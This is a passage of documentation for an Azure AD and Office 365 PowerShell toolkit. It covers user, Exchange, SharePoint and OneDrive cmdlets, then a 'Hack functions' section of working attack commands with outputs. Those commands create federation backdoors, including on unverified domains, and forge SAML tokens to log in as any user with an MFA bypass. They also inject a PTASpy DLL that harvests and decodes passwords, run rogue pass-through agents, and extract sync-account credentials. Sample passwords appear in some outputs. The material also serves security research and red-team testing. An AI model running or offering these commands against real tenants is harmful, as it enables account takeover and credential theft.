StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2018-10-25T15:13:10.8686574Z
Title                                  : 
UsageLocation                          : 
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : new.user@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 
Password                               : Tog59451

Set-AADIntUser (A)

This function changes user’s information.

Example:

# Set user information
Set-AADIntUser -UserPrincipalName "user@company.com" -FirstName "Dave"

Remove-AADIntUser (A)

This function removes a user.

Example:

# Remove the user
Remove-AADIntUser -UserPrincipalName "user@company.com"

Get-AADIntGlobalAdmins (A)

This function returns all Global Admins of the tenant.

Example:

# Get global admins
Get-AADIntGlobalAdmins

Output:

DisplayName    UserPrincipalName                 
-----------    -----------------                 
admin demo     admin@company.onmicrosoft.com
Dave the Admin dave@company.com            

Get-AADIntUserMFA (A)

Since version 0.2.8
Gets user’s MFA settings

Example:

# Get the access token
$at=Get-AADIntAccessTokenForAADGraph
    
# Get user's MFA settings 
Get-AADIntUserMFA -AccessToken $at -UserPrincipalName user@company.com

Output:

UserPrincipalName      : user@company.com
State                  : Enforced
PhoneNumber            : +1 123456789
AlternativePhoneNumber : +358 123456789
Email                  : someone@hotmail.com
DefaultMethod          : OneWaySMS
Pin                    : 
OldPin                 : 
StartTime              :          

Set-AADIntUserMFA (A)

Since version 0.2.8
Sets user’s MFA settings

Example:

# Get the access token
$at=Get-AADIntAccessTokenForAADGraph
    
# Set user's MFA settings 
Set-AADIntUserMFA -AccessToken $at  -UserPrincipalName user@company.com -PhoneNumber "+1 123456789" -DefaultMethod PhoneAppNotification

User manipulation with AD sync api

These functions provide some functionality allowing manipulation of Azure AD objects otherwise impossible.

NOTE! these function uses Azure AD synchronization API and may cause severe harm to the tenant!! USE ON YOUR OWN RISK!

Get-AADIntSyncObjects (A)

This function returns all Azure AD objects that are not synced to the on-premises AD.

Example:

# Get synchronisable objects from AAD
Get-AADIntSyncObjects | Select UserPrincipalName

Output:

UserPrincipalName          
-----------------          
BrianJ@company.com            
LynneR@company.com                        
MiriamG@company.com                       
AllanD@company.com                        
IsaiahL@company.com               

Set-AADIntAzureADObject (A)

This function creates new OR modifies existing Azure AD object.

Allows setting all Azure AD attributes. The sourceAnchor attribute is the most important one and is automatically set only to synced users. This is typically the ImmutableID (Base64 encoded on-prem AD object’s GUID), but can be any string that is unique tenant wide.

Example:

# Create a new user
Set-AADIntAzureADObject -userPrincipalName "someone@company.com" -sourceAnchor "ABC" -netBiosName

Output:

CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add

Remove-AADIntAzureADObject (A)

This function removes an AAD object.

Example:

# Remove AAD object
Remove-AADIntAzureADObject -sourceAnchor ABC

Output:

CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add

Set-AADIntUserPassword (A)

This function sets the user’s password. Also the last change time can be set, must be before the current time.

Example:

# Set the password and the change date to 1/1/1970
Set-AADIntUserPassword -SourceAnchor qIMPTm2Q3kimHgg4KQyveA== -Password "a" -ChangeDate 1/1/1970

Output: (Result 0 = success)

CloudAnchor Result SourceAnchor            
----------- ------ ------------            
CloudAnchor 0      qIMPTm2Q3kimHgg4KQyveA==

Reset-AADIntServiceAccount (A)

This function creates a new service account (or reset the password for existing one). The created user will have DirectorySynchronizationAccount role.

Azure AD Connect uses this during the configuration stage to create the service account and stores the username and password to the configuration database.

Example:

# Create a new service account for AD sync
Reset-AADIntServiceAccount -ServiceAccount Sync_MyServer_nnnnnnn

Output:

Password         UserName                                          
--------         --------                                          
5(]lCy=Q{.#@lb}p Sync_MyServer_nnnnnnn@company.onmicrosoft.com

Exchange Online functions

Eachange Online functions are used to manipulate devices and send mail using ActiveSync and Outlook APIs. Functions marked with E uses Exchange Online access token.

Get-AADIntEASAutoDiscover (*)

Since version 0.1.6
Returns endpoints for the given protocol for the given email address. If the email address is invalid (i.e. the user does not exists) this takes ages..

Example:

# Get endpoint for EWS api
Get-AADIntEASAutoDiscover -Email "some.user@company.com" -Protocol Ews

Output:

Protocol  Url                         
--------  ---                         
Substrate https://substrate.office.com

Get-AADIntEASAutoDiscoverV1 (E)

Since version 0.1.6
Returns ActiveSync endpoint for the given user (credentials or access token).

Example:

# Get credentials
$Cred=Get-Credential
# Get endpoint for ActiveSync
Get-AADIntEASAutoDiscoverV1 -Credentials $Cred

Output:

https://outlook.office365.com/Microsoft-Server-ActiveSync

Set-AADIntEASSettings (E)

Since version 0.1.6
Adds new or modifies existing ActiveSync device for the given user (credentials or access token). The added or modified device can be used to send emails with Send-AADIntEASMessage

Example:

# Get credentials
$Cred=Get-Credential
# Create a device
Set-AADIntEASSettings -Credentials $Cred -DeviceId android01234 -DeviceType Android -Model "Android 01234" -PhoneNumber "+1234567890"

Output:

<Settings xmlns="Settings"><Status>1</Status><DeviceInformation><Status>1</Status></DeviceInformation></Settings>

Get-AADIntMobileDevices (E)

Since version 0.1.6
Gets mobile devices from Exchange Online. Devices can be used to send emails with Send-AADIntEASMessage

Example:

# Get credentials
$Cred=Get-Credential
# Get Mobile Devices
Get-AADIntMobileDevices -Credentials $Cred | select DeviceId,DeviceType,ClientType,UserDisplayname

Output:

DeviceId     DeviceType                 ClientType UserDisplayName                                                 
--------     ----------                 ---------- ---------------                                                 
430847304    TestActiveSyncConnectivity EAS        EURP189A002.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizat
android01234 Android                    EAS        EURP189A002.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizat

Send-AADIntEASMessage (E)

Since version 0.1.6
Sends an email from the given user via ActiveSync using the given device.

Example:

# Get credentials
$Cred=Get-Credential
# Send an email
Send-AADIntEASMessage -Credentials $Cred -DeviceId android01234 -DeviceType Android -Recipient "someone@company.com" -Subject "An email" -Message "<h2>This is a message!</h2>"

Output:

WARNING: Message was not Base64 encoded, converting..

Send-AADIntOutlookMessage (E)

Since version 0.1.6
Sends an email from the given user via Outlook API.

Example:

# Get accesstoken
$At=Get-AADIntAccessTokenForEXO
# Create the email
Send-AADIntOutlookMessage -AccessToken $At -Recipient "someone@company.com" -Subject "An email" -Message "<h2>This is a message!</h2>"

SharePoint Online functions

Eachange Online functions are used to retrieve information of users and groups of SharePoint sites.

Get-AADIntSPOSiteUsers (S)

Since version 0.2.4
Returns users of the given site. Only visitor (read-access) is needed :)

Example:

# Get site users
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOSiteUsers -Site https://company.sharepoint.com -AuthHeader $ah

Output:

IsSiteAdmin                    : True
Id                             : 17
LoginName                      : c:0t.c|tenant|a200e3ee-47d0-4b9b-99c6-554b85823042
PrincipalType                  : 4
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : 
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : 
NameIdIssuer                   : 
Title                          : SharePoint Service Administrator
Email                          : 

IsSiteAdmin                    : False
Id                             : 1073741823
LoginName                      : SHAREPOINT\system
PrincipalType                  : 1
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : 
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : S-1-0-0
NameIdIssuer                   : urn:offic€:idp:activedirectory
Title                          : System Account
Email                          : 

IsSiteAdmin                    : False
Id                             : 23
LoginName                      : i:0#.f|membership|user@company.com
PrincipalType                  : 1
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : user@company.com
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : 10030000b5466d52
NameIdIssuer                   : urn:federation:microsoftonline
Title                          : user
Email                          : user@company.com

Get-AADIntSPOUserProperties (S)

Since version 0.2.4
Returns detailed information of the given user. Only visitor (read-access) is needed :)

Note: the user’s name must be in SharePoint “LoginName” format as above.

Example:

# Get site users
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOUserProperties -Site https://company.sharepoint.com -AuthHeader $ah -User "i:0#.f|membership|user@company.com"

Output:

Updated                            : 2019-08-16T07:59:30Z
Author                             : 
AccountName                        : i:0#.f|membership|user@company.com
DirectReports                      : 
DisplayName                        : user
Email                              : user@company.com
ExtendedManagers                   : 
ExtendedReports                    : i:0#.f|membership|user@company.com
IsFollowed                         : False
Peers                              : 
PersonalUrl                        : https://company-my.sharepoint.com/personal/user_company_com/
PictureURL                         : 
UserUrl                            : https://company-my.sharepoint.com:443/Person.aspx?accountname=i:0#.f|membership|user@company.com
Title                              : 
UserProfile_GUID                   : f6b3014d-c4d7-4775-a37c-1e6f14fa98f9
SID                                : i:0h.f|membership|10030000a5566b50@live.com
ADGuid                             : System.Byte[]
FirstName                          : 
SPS-PhoneticFirstName              : 
LastName                           : 
SPS-PhoneticLastName               : 
PreferredName                      : user
SPS-PhoneticDisplayName            : 
WorkPhone                          : 
Department                         : 
SPS-Department                     : 
Manager                            : 
AboutMe                            : 
PersonalSpace                      : /personal/user_company_com/
UserName                           : user@company.com
QuickLinks                         : 
WebSite                            : 
PublicSiteRedirect                 : 
SPS-JobTitle                       : 
SPS-Dotted-line                    : 
SPS-Peers                          : 
SPS-Responsibility                 : 
SPS-SipAddress                     : user@company.com
SPS-MySiteUpgrade                  : 
SPS-ProxyAddresses                 : 
SPS-HireDate                       : 
SPS-DisplayOrder                   : 
SPS-ClaimID                        : user@company.com
SPS-ClaimProviderID                : membership
SPS-ResourceSID                    : 
SPS-ResourceAccountName            : 
SPS-MasterAccountName              : 
SPS-UserPrincipalName              : user@company.com
SPS-O15FirstRunExperience          : 
SPS-PersonalSiteInstantiationState : 2
SPS-DistinguishedName              : CN=abf7eff8-59a5-456f-a723-976f07b14420,OU=a200e3ee-47d0-4b9b-99c6-554b85823042,OU=Tenants,OU=MSO
                                     nline,DC=SPODS44818354,DC=msoprd,DC=msft,DC=net
SPS-SourceObjectDN                 : 
SPS-ClaimProviderType              : Forms
SPS-SavedAccountName               : SPODS44833354\$JUHIC0-TJJO02Q7PVM2
SPS-SavedSID                       : System.Byte[]
SPS-ObjectExists                   : 
SPS-PersonalSiteCapabilities       : 4
SPS-PersonalSiteFirstCreationTime  : 10/2/2017 5:50:10 PM
SPS-PersonalSiteLastCreationTime   : 10/2/2017 5:50:10 PM
SPS-PersonalSiteNumberOfRetries    : 1
SPS-PersonalSiteFirstCreationError : 
SPS-FeedIdentifier                 : 
WorkEmail                          : user@company.com
CellPhone                          : 
Fax                                : 
HomePhone                          : 
Office                             : 
SPS-Location                       : 
Assistant                          : 
SPS-PastProjects                   : 
SPS-Skills                         : 
SPS-School                         : 
SPS-Birthday                       : 
SPS-StatusNotes                    : 
SPS-Interests                      : 
SPS-HashTags                       : 
SPS-EmailOptin                     : 
SPS-PrivacyPeople                  : True
SPS-PrivacyActivity                : 4095
SPS-PictureTimestamp               : 
SPS-PicturePlaceholderState        : 
SPS-PictureExchangeSyncState       : 
SPS-TimeZone                       : 
OfficeGraphEnabled                 : 
SPS-UserType                       : 0
SPS-HideFromAddressLists           : False
SPS-RecipientTypeDetails           : 
DelveFlags                         : 
msOnline-ObjectId                  : abf7eff8-59a5-456f-a723-976f07b14420
SPS-PointPublishingUrl             : 
SPS-TenantInstanceId               : 
SPS-SharePointHomeExperienceState  : 
SPS-MultiGeoFlags                  : 
PreferredDataLocation              : 

Get-AADIntSPOSiteGroups (S)

Since version 0.2.4
Returns groups of the given site. Only visitor (read-access) is needed :)

Example:

# Get site groups
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOSiteGroups -Site https://company.sharepoint.com -AuthHeader $ah

Output:

AllowRequestToJoinLeave        : False
Id                             : 3
LoginName                      : Excel Services Viewers
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : Excel Services Viewers
OwnerTitle                     : System Account

AllowRequestToJoinLeave        : False
Id                             : 19
LoginName                      : SharePointHome OrgLinks Admins
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Admins
OwnerTitle                     : SharePointHome OrgLinks Admins

AllowRequestToJoinLeave        : False
Id                             : 20
LoginName                      : SharePointHome OrgLinks Editors
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Editors
OwnerTitle                     : SharePointHome OrgLinks Editors

AllowRequestToJoinLeave        : False
Id                             : 21
LoginName                      : SharePointHome OrgLinks Viewers
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Viewers
OwnerTitle                     : SharePointHome OrgLinks Admins

AllowRequestToJoinLeave        : False
Id                             : 9
LoginName                      : Team Site Members
AllowMembersEditMembership     : True
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Members
OwnerTitle                     : Team Site Owners

AllowRequestToJoinLeave        : False
Id                             : 7
LoginName                      : Team Site Owners
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Owners
OwnerTitle                     : Team Site Owners

AllowRequestToJoinLeave        : False
Id                             : 8
LoginName                      : Team Site Visitors
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Visitors
OwnerTitle                     : Team Site Owners

OneDrive for Business functions

OneDrive functions are used to download, send, and modify files using OneDrive for Business APIs.

New-AADIntOneDriveSettings

Since version 0.2.7
Creates a new OneDriveSettings object used with other OneDrive for Business functions.

To create new settings using interactive authentication (promtps twice for both OfficeApps and OneDrive APIs):

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

To create new settings using Kerberos tickets:

Example:

# Create a Kerberos ticket
$kt=New-AADIntKerberosTicket -ADUserPrincipalName user@company.com -Password "mypassword"

# Create a new OneDriveSettings object using Kerberos ticket
$os = New-AADIntOneDriveSettings -KerberosTicket $kt

Get-AADIntOneDriveFiles (O)

Since version 0.2.7
Downloads user’s OneDrive for Business files (all of them).

Besides downloading the files, the following information is returned per file.

Attribute Description
Path The relative path of the file or folder
Size Size in bytes
ETag Resource id and the next version number of the file in format “{},
Created The time when the file was created
Modified The time when the file was modified
ResourceID The unique id of the file or folder
MimeType The mime type of the file
Url The “pre-authenticated” url of the file
XORHash Xor-hash value of the file

Note! If you only want to list the files and folders, use -PrintOnly switch. If sync is restricted to only the members of specific domain(s), use the -DomainGuid parameter.

To download user’s OneDrive files, use the following commands:

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

# Download the contents of the OneDrive to the current folder    
Get-AADIntOneDriveFiles -OneDriveSettings $os | Format-Table

Output:

Path                              Size  Created            Modified           ResourceID                   
----                              ----  -------            --------           ----------                   
\RootFolder\Document1.docx        11032 2.12.2019 20.47.23 2.12.2019 20.48.46 5e7acf393a2e45f18c1ce6caa7...
\RootFolder\Book.xlsx             8388  2.12.2019 20.49.14 2.12.2019 20.50.14 b26c0a38d4d14b23b785576e29...
\RootFolder\Docs\Document1.docx   84567 9.12.2019 11.24.40 9.12.2019 12.17.50 d9d51e47b66c4805aff3a08763...
\RootFolder\Docs\Document2.docx   31145 7.12.2019 17.28.37 7.12.2019 17.28.37 972f9c317e1e468fb2b6080ac2...

Send-AADIntOneDriveFile (O)

Since version 0.2.7
Sends a local file to user’s OneDrive to a specific folder.

Note! To send file, you need ResourceId of the folder you are sending the file.

Note! If sync is restricted to only the members of specific domain(s), use the -DomainGuid parameter.

To send a file to user’s OneDrive to Documents folder:

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

# List folders and their resource ids:
Get-AADIntOneDriveFiles -OneDriveSettings $os -PrintOnly -FoldersOnly | select Path,ResourceID

Path                  ResourceID                      
----                  ----------                      
\RootFolder           1679e14635404542880e3885b4374c3f
\RootFolder\Documents a2a54a01b586480ebbddf04cfaa36191
\RootFolder\Sales     bd59baa485a2411e951234fe6cbd8c5d
# Send the file to Documents folder
Send-AADIntOneDriveFile -OneDriveSettings $os -FileName .\Document.docx -FolderId "a2a54a01b586480ebbddf04cfaa36191"

Output:

ResourceID                            : 32b66e08379d4c448e001e9659777c71
ETag                                  : "{32B66E08-379D-4C44-8E00-1E9659777C71},2"
DateModified                          : 2019-12-11T11:18:38.0000000Z
RelationshipName                      : Document.docx
ParentResourceID                      : a2a54a01b586480ebbddf04cfaa36191
fsshttpstate.xschema.storage.live.com : fsshttpstate.xschema.storage.live.com
DocumentStreams                       : DocumentStreams
WriteStatus                           : Success

If the file exists etc. you’ll get following error or similar:

RelationshipName ParentResourceID                 WriteStatus      
---------------- ----------------                 -----------      
Document         a2a54a01b586480ebbddf04cfaa36191 ItemAlreadyExists

To update existing file, you also need to know the ETag: Example:

# Update the file to Documents folder
Send-AADIntOneDriveFile -OneDriveSettings $os -FileName .\Document.docx -FolderId "a2a54a01b586480ebbddf04cfaa36191" -ETag "{32B66E08-379D-4C44-8E00-1E9659777C71},2"

Output:

ResourceID                            : 32b66e08379d4c448e001e9659777c71
ETag                                  : "{32B66E08-379D-4C44-8E00-1E9659777C71},3"
DateModified                          : 2019-14-11T12:08:55.0000000Z
RelationshipName                      : Document.docx
ParentResourceID                      : a2a54a01b586480ebbddf04cfaa36191
fsshttpstate.xschema.storage.live.com : fsshttpstate.xschema.storage.live.com
DocumentStreams                       : DocumentStreams
WriteStatus                           : Success

Hack functions

Hack functions are used to hack Azure AD and Office 365. These functions are exploiting known and not so known AAD features.

USE ON YOUR OWN RISK!

Set-AADIntDomainAuthentication (A)

Sets authentication method of the domain. Same functionality than Set-MsolDomainAuthentication cmdlet.

Example:

# Set authentication method to managed
Set-AADIntDomainAuthentication -DomainName company.com -Authentication Managed

ConvertTo-AADIntBackdoor (A)

This function converts the given domain to “backdoor”, which can be used to login to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor.

This exploits a vulnerability I discovered in late 2017. Technically, domain authentication type is set to Federated and configured to trust to the specific certificate (any.sts) and issuer. You can get a free domain from www.myo365.site.

Edit May 9th 2019: In late 2018 I discovered that also unverified domains can be used as a backdoor. Microsoft has not responded to emails regarding this “feature”.

Example:

# Convert the domain to backdoor
ConvertTo-AADIntBackdoor -DomainName company.myo365.site

Output:

Backdoor created. Domain: company.myo365.site, issuer=http://any.sts/B231A11F

New-AADIntBackdoor (A)

Since version 0.1.6
This function creates a “backdoor” for the given domain name, which can be used to login to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor.

This exploits a vulnerability I discovered in late 2018 which allows setting the authentication method also for the unverified domains. Microsoft has not responded to emails regarding this “feature”.

Example:

# Create a new backdoor
New-AADIntBackdoor -DomainName microsoft.com

Output:

Are you sure to create backdoor with microsoft.com? Type YES to continue or CTRL+C to abort: yes

Authentication     : Managed
Capabilities       : None
IsDefault          : false
IsInitial          : false
Name               : microsoft.com
RootDomain         : 
Status             : Unverified
VerificationMethod : 

Backdoor created. Domain: microsoft.com, issuer=http://any.sts/B231A11F

Open-AADIntOffice365Portal (*)

This function creates a fake (but valid) WS-Fed/SAML authentication token in .html file and opens it in Internet Explorer in private mode. Use any ImmutableId from any user from your tenant and the issuer “http://any.sts/B231A11F" you created with ConvertTo-AADIntBackdoor.

Internet Explorer should log in automatically unless security settings doesn’t allow that. If that happens, just click Allow blocked content or the button Login to Office 365 and you’re done! From there, you can also browse to https://portal.azure.com as the same user you just logged in.

Example:

# Login as anyone
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA $true

Output: (security alert) aadint

Set-AADIntPassThroughAuthentication (P)

This function enables or disabled pass through authentication (PTA).

Example:

# Prompt for credentials and store the token
$pt=Get-AADIntAccessTokenForPTA -Credentials (Get-Credential)
# Disable PTA
Set-AADIntPassThroughAuthentication -AccessToken $pt -Enable $false

Output:

IsSuccesful Enable Exists
----------- ------ ------
true        false  true 

Install-AADIntPTASpy (*)

Since version 0.2.0
Installs PTASpy to the pass-thru authentication agent on the current computer. Must be run as Local Admin on the computer having Azure AD Authentication Agent installed and running (AzureADConnectAuthenticationAgentService.exe).

A hidden folder is created (C:\PTASPy) and PTASpy.dll is copied there. PTASpy.dll is then injected to the running AzureADConnectAuthenticationAgentService. When installed, PTASpy collects all used credentials and stores them to C:\PTASpy\PTASpy.csv with Base64 encoded passwords. PTASpy accepts all passwords so it can be used as a backdoor.

Use Get-AADIntPTASpyLog to read the log.

Example:

# Install PTASpy
Install-AADIntPTASpy

Output:

Are you sure you wan't to install PTASpy to this computer? Type YES to continue or CTRL+C to abort: yes
Installation successfully completed!
All passwords are now accepted and credentials collected to C:\PTASpy\PTASpy.csv

Get-AADIntPTASpyLog (*)

Since version 0.2.0
Lists the credentials from C:\PTASpy\PTASPy.csv collected by PTASpy

Example 1:

# Show the PTASpy log
Get-AADIntPTASpyLog

Output:

UserName         Password                     Time                
--------         --------                     ----                
user@company.com TQB5AFAAYQBzAHMAdwBvAHIAZAA= 5/22/2019 9:51:43 AM
user@company.com bQBZAHAAQQBTAFMAVwBPAFIARAA= 5/22/2019 9:52:07 AM

Example 2:

# Show the PTASpy log with decoded passwords
Get-AADIntPTASpyLog -DecodePasswords

Output:

UserName         Password   Time                
--------         --------   ----                
user@company.com MyPassword 5/22/2019 9:51:43 AM
user@company.com mYpASSWORD 5/22/2019 9:52:07 AM

Remove-AADIntPTASpy (*)

Since version 0.2.0
Restarts Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent) service and removes PTASpy.

Example:

# Remove PTASpy
Remove-AADIntPTASpy

Output:

WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
Service restarted and C:\PTASpy\PTASpy.dll removed.

Register-AADIntPTAAgent (P)

Since version 0.2.8
Registers a PTA agent to Azure AD with given machine name and creates a client certificate. After the registration, the certificate and name can be used with Microsoft AzureAD Connect / PTA agent (Set-AADIntPTACertificate) or with Invoke-AADIntPTAAgent

Example 1:

# Register a PTA Agent
Register-AADIntPTAAgent -MachineName "server1.company.com"

Output:

PTA agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx

Example 2:

# Register a PTA Agent
pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -AccessToken $pt -MachineName "server1.company.com" -FileName server1.pfx

Output:

PTA agent registered as server1.company.com
Certificate saved to server1.pfx

Set-AADIntPTACertificate (*)

Since version 0.2.8
Sets the certificate used by Azure AD Authentication Agent. Can be used to change the name and target tenant of the PTA Agent. It changes InstanceID and TenantID registry values at “HKLM:\SOFTWARE\Microsoft\Azure AD Connect Agents\Azure AD Connect Authentication Agent”, and the certificate thumbprint at “$env:ProgramData\Microsoft\Azure AD Connect Authentication Agent\Config\TrustSettings.xml”. Together with PTASpy allows using a standalone server as a backdoor.

Note! The given certificate must be available at “Cert:\LocalMachine\My” or the service won’t start. Moreover, after restarting the service, PTA Agent is unable to decrypt password requests. To get the decryption to work, you MUST manually give read access for “Network Service” to the private certificate at “C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\“. Use Process Monitor to see which file gets ACCESS DENIED error.

Example 1:

# Change the PTA certificate
Set-AADIntPTACertificate -PfxFileName server1.pfx -PfxPassword "password"

Output:

Certification information set, remember to restart the service.

Example 2:

# Register a PTA agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -MachineName "server1.company.com" -AccessToken $pt

Output:

PTA agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx
# Change the PTA certificate
Set-AADIntPTACertificate

Output:

Certification information set, remember to restart the service.

Invoke-AADIntPTAAgent (*)

Since version 0.2.8
Invokes PTA Agent with given name and certificate, and connect to Azure AD. Emulates Azure AD Authentication Agent by accepting any password and dumping them to console.

Note! This is AN EXPERIMENTAL version likely to crash! PowerShell implementation was too slow, so had to code this in C#

Example 1:

# Invoke the PTA Agent
Invoke-AADIntPTAAgent -MachineName "server1.company.com" -FileName server1.pfx

Output:

Connector 1 connecting to his-eur1-neur1
Connector 2 connecting to his-eur1-neur1
Connector 3 connecting to his-eur1-weur1
Connector 4 connecting to his-eur1-weur1

PTAAgent started, waiting for logins..

Example 2:

# Register a PTA agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -AccessToken $pt -MachineName "server1.company.com"

Output:

PTA agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx
# Invoke the PTA Agent
Invoke-AADIntPTAAgent -MachineName "server1.company.com"

Output:

Connector 1 connecting to his-eur1-neur1
Connector 2 connecting to his-eur1-neur1
Connector 3 connecting to his-eur1-weur1
Connector 4 connecting to his-eur1-weur1

PTAAgent started, waiting for logins..

Set-AADIntPasswordHashSyncEnabled (A)

Since version 0.1.6
This function enables or disabled password hash synchronization (PHS).

This can be used to turn on PHS so that passwords can be set using Set-AADIntUserPassword.

Example:

# Enable PHS
Set-AADIntPasswordHashSyncEnabled -Enable $true

New-AADIntGuestInvitation (Z)

This function invites a guest user to tenant. Does not require admin rights, as long as access to Azure Portal is allowed. Basically, this function allows every member of the tenant to invite guest users to the tenant.

Example:

# Get the auth token. Supports also external users (outlook.com, etc.)
$zt=Get-AADIntAuthTokenForAADIAMAPI -Credentials (Get-Credential)
# Get login information for a domain
New-AADIntGuestInvitation -AuthToken $zt -EmailAddress someone@outlook.com -Message "Welcome to our tenant!"

Output:

accountEnabled                        : True
usageLocation                         : 
mailNickname                          : someone_outlook.com#EXT#
passwordProfile                       : 
rolesEntity                           : 
selectedGroupIds                      : 
streetAddress                         : 
city                                  : 
state                                 : 
country                               : 
telephoneNumber                       : 
mobile                                : 
physicalDeliveryOfficeName            : 
postalCode                            : 
authenticationPhoneNumber             : 
authenticationAlternativePhoneNumber  : 
authenticationEmail                   : 
strongAuthenticationDetail            : @{verificationDetail=}
defaultImageUrl                       : 
ageGroup                              : 
consentProvidedForMinor               : 
legalAgeGroupClassification           : 
objectId                              : e250c8f5-3ff3-4eea-9d68-cff019fa850e
objectType                            : User
displayName                           : someone
userPrincipalName                     : someone_outlook.com#EXT#@company.onmicrosoft.com
thumbnailPhoto@odata.mediaContentType : 
givenName                             : 
surname                               : 
mail                                  : someone@outlook.com
dirSyncEnabled                        : 
alternativeSecurityIds                : {}
signInNamesInfo                       : {}
signInNames                           : {someone_outlook.com#EXT#@company.onmicrosoft.com}
ownedDevices                          : 
jobTitle                              : 
department                            : 
displayUserPrincipalName              : 
hasThumbnail                          : False
imageUrl                              : 
imageDataToUpload                     : 
source                                : 
sources                               : 
sourceText                            : 
userFlags                             : 
deletionTimestamp                     : 
permanentDeletionTime                 : 
alternateEmailAddress                 : 
manager                               : 
userType                              : Guest
isThumbnailUpdated                    : 
isAuthenticationContactInfoUpdated    : 
searchableDeviceKey                   : {}
displayEmail                          : 
creationType                          : Invitation
userState                             : PendingAcceptance
otherMails                            : {someone@outlook.com}

Get-AADIntSyncCredentials (*)

Since version 0.1.8
This function extracts Azure AD Connect credentials to AD and Azure AD from WID database.

Example:

# Get Azure AD Connect credentials
Get-AADIntSyncCredentials

Output:

Name                           Value
----                           -----
ADDomain                       company.com  
ADUser                         MSOL_4bc4a34e95fa
ADUserPassword                 Q9@p(poz{#:kF_G)(s/Iy@8c*9(t;...
AADUser                        Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com                                                   
AADUserPassword                $.1%(lxZ&/kNZz[r

Update-AADIntSyncCredentials (*)

Since version 0.1.8
This function resets Azure AD Connect credentials to Azure AD and stores it to Azure AD Connect configuration database.

Example:

# Get the current Azure AD Connect credentials
Get-AADIntSyncCredentials
# Save credentials to a variable
$Cred = Get-Credential -Message "O365" -UserName "Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com"

# Get Access Token
$Token=Get-AADIntAccessTokenForAADGraph -Credentials $Cred

# Update Azure AD Connect credentials for Azure AD
Update-AADIntSyncCredentials -AccessToken $Token

Output:

Password successfully updated to Azure AD and configuration database!

Name                           Value
----                           -----
ADDomain                       company.com  
ADUser                         MSOL_4bc4a34e95fa
ADUserPassword                 Q9@p(poz{#:kF_G)(s/Iy@8c*9(t;...
AADUser                        Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com                                                   
AADUserPassword                Y%C(]u%Rq;en-P;^

